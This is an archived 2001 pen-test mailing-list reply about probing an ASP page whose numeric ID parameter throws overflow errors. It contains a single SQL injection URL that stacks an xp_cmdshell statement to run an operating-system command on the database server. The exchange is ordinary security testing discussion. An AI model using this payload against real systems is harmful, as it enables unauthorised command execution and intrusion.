Re: ASP code testing

From: rudi carell (rudicarell@hotmail.com)
Date: 11/19/01 

From: "rudi carell" <rudicarell@hotmail.com>
To: dan.richardson@paradise.net.nz, pen-test@securityfocus.com
Subject: Re: ASP code testing
Date: Mon, 19 Nov 2001 08:11:52 
Message-ID: <F25418olkDTM9wGmAf00000113f@hotmail.com>

hi dan,

if the application(not the DB!) does not check for a valid number(int) ,
i d recommand appending a second statement something like:

---cut here---

http://server/showsomething.asp?
ID=5['|"|<nothing>];exec+master%2e%2exp_cmdshell+%22dir+c:\%22;--%00

---cut here---

if not, go for the next input field ...

rc

>http://www.asite.com/show/showsomething.asp?ID=5
>Will retrieve a legitmate item from the database. By playing with the
>number a bit- http://www.asite.com/show/showsomething.asp?ID=32767
>
>Will generate
>
>ADODB.Field error '80020009'
>
>Either BOF or EOF is True, or the current record has been deleted.
>Requested operation requires a current record.
>
>But if I bump that number up to 32768 (unsigned integer limit)-
>
>Microsoft VBScript runtime error '800a0006'
>
>Overflow: 'cint'

rc

security@freefly.com
http://www.freefly.com/security/

_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Relevant Pages

  • Re: faster scans? (nmap)
    ... one host using nmap for syn scans in burst mode with the ... >>>This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • Re: pen test help please asap
    ... > Machine A on client site makes a configurable encrypted OUTBOUND ... > This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... This list is provided by the SecurityFocus Security Intelligence Alert ...
    (Pen-Test)
  • Re: ettercap help
    ... Anyways have never tried Ettercap for VNC. ... > This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... This list is provided by the SecurityFocus Security Intelligence Alert ...
    (Pen-Test)
  • Re: ettercap help
    ... > I can get it to sniff telnet, ftp, pop, smb, but no vnc. ... > This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • Re: Wardialing
    ... >>> achieving the connection with the modem. ... >>This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)